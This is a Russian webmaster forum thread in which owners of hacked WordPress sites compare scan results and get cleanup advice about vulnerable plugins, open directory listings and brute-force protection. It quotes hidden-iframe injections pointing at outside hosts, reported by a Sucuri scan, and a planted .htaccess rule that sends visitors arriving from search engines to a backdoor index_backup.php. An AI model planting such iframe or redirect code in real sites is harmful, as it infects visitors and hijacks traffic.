- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
В 2023 году Google заблокировал более 170 млн фальшивых отзывов на Картах
Это на 45% больше, чем в 2022 году
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
SeVlad, ну можно скачать файлы и проверить, только толку ноль. То, что тотал найдет - конечный результат, а не вирус.
6666, ну ты ж в курсе, что я в курсе ;)
И полностью согласен.
Нашел еще одну лазейку на твоем сайте, у тебя диры не защищены от просмотра, и все видят плагины и прочее
http://pugachevskoevremya.ru/wp-content/plugins/
nextgen-gallery - xss
wp-polls - вроде тоже уязвим
Остальные плагины стабильной версий, уязвимости нашел только по старым версиям, проверь еще сам - я поверхностно смотрел.
Вообще рекомендую тебе удалить лишние плагины без которых ты можешь обойтись, много их у тебя слишком
Еще одна лазейка - это админка, которая не защищена от брута. Установи плагины login-lockdown, anti-xss-attack
Еще одна лазейка - это файл timthumb в шабе - думаю хакнули отсюда (может и нет), у меня не получилось
Дорогие друзья у меня такая же хренотень, но на нескольких сайтах.
Сайты на вордпресе, стоят два плагина защиты и все равно сломали. Проверил все сайты Анти-Мал плагином (просканировал) он ничего не нашел.
Вот сайты, яндекс нашел такой же вирусняк, что и у ТС.
Не знаю, что делать помогите нам))
Первый сайт
Malware found in the URL:
http://avtoshkola-spb-kav.ru/documents/
Hidden Iframes.
Details: http://sucuri.net/malware/entry/MW:IFRAME:HD202
<iframe src="http://microrage.com/projects/vjstar/css/css.php" width=1 height=1 style="visibility: hidden">
Known javascript malware.
Details: http://sucuri.net/malware/malware-entry-mwjsanon7
<iframe src="http://microrage.com/projects/vjstar/css/css.php" width=1 height=1 style="visibility: hidden"></iframe><!DOCTYPE html>
Malware found in the URL:
http://avtoshkola-spb-kav.ru/auto/
Hidden Iframes.
Details: http://sucuri.net/malware/entry/MW:IFRAME:HD202
<iframe src="http://microrage.com/projects/vjstar/css/css.php" width=1 height=1 style="visibility: hidden">
Known javascript malware.
Details: http://sucuri.net/malware/malware-entry-mwjsanon7
<iframe src="http://microrage.com/projects/vjstar/css/css.php" width=1 height=1 style="visibility: hidden"></iframe><!DOCTYPE html>
Второй сайт
Malware found in the URL:
http://obivkamebelispb.ru/about/
Hidden Iframes.
Details: http://sucuri.net/malware/entry/MW:IFRAME:HD202
<iframe src="http://www.teatr-studio.lt/images/images.php" width=1 height=1 style="visibility: hidden">
Known javascript malware.
Details: http://sucuri.net/malware/malware-entry-mwjsanon7
<iframe src="http://www.teatr-studio.lt/images/images.php" width=1 height=1 style="visibility: hidden"></iframe><!DOCTYPE html>
Не знаю, что делать помогите нам))
Помогаю: читай закреплённый в разделе топик.
Павел Гуляев, Всё уже решено в этом топике по WP, читай и делай
Кот в сапогах, с timthumb что делать? Поставить плагин, который его обновлять будет автоматически?
Сейчас сканирую айболитом по ssh, как найду что-то, отпишусь здесь. Потом в закрепленную тему подробно отпишу, как эту ерунду с WP удалять.
Кот в сапогах, с timthumb что делать? Поставить плагин, который его обновлять будет автоматически?
Сейчас сканирую айболитом по ssh, как найду что-то, отпишусь здесь. Потом в закрепленную тему подробно отпишу, как эту ерунду с WP удалять.
Директорий сначала закрой от просмотра и пароль смени на админку т.к. хакер хэш уже может сбрутил.
Удали zip архивы с плагинами и темой.
Насчет timthumb хз, погугли, я бы тему сменил. Привыкай к минимализму, чем система проще, тем держать её под контролем легче :)
Заметь, я в предыдущем посте написал плагины которые уязвимы. Который помечен как XSS 100% уязвим
Результаты сканирования айболит:
Обнаружил во всех папках хостинга файлы .htaccess со следующим содержанием:
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|yandex|ya|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|linkedin|flickr|filesearch|yell|openstat|metabot|gigablast|entireweb|amfibi|dmoz|yippy|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|infospace|web|websuche|witch|wolong|oekoportal|freenet|arcor|alexana|tiscali|kataweb|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|westaustraliaonline)\.(.*)
RewriteCond %{HTTP_USER_AGENT} ^.*(msie|opera) [NC]
RewriteCond %{REQUEST_FILENAME} !/index_backup.php
RewriteRule (.*) /index_backup.php?query=$1 [QSA,L]
</IfModule>
А также во всех каталогах появились файлы index_backup.php и index.php.
Но как понимаю, это только последствия...
Кто-нибудь объясните пожалуйста вкратце этот код в .htaccess
А также во всех каталогах появились файлы index_backup.php и index.php.
Покажи index_backup.php
Пустые index.php в каждом каталоге должны быть